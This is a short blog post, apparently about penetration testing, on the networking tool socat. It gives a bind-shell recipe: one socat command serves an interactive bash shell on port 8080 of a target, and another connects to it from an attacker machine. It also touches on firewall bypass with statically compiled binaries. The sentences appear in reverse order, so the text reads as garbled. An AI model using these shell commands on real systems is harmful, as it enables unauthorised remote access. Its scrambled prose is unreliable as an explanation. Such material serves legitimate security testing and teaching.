6/9/2023 0 Comments Socat usageWe can get around this by using the outbound technique that I will show later. – The firewall might block non-default ports (such as 8080).– The IP will be listening for any connection.This shell works great, but there are two obvious problems: On the attacker machine run socat - TCP:$clientip:8080 On the client run: socat TCP-LISTEN:8080 exec:"bash -i",pty,stderr,setsid,sigint,sane This project includes a statically compiled versions of socat for x86/x86_64 and allows the tool to have a lot more portability between differing Linux distributions and major library versions for a small cost of ~2MB. There is a cool project called static-toolbox which provides statically compiled networking and debugging tools. When performing a penetration test this tool can be leveraged to bypass basic firewall restrictions and transfer files across the network. It has a large amount of support for different protocols and data sources, including OPENSSL, SOCKS4, TCP, UDP, TAP, SCTP and more. Socat is a general-purpose networking tool that allows the creation of two bidirectional streams.
0 Comments
Leave a Reply. |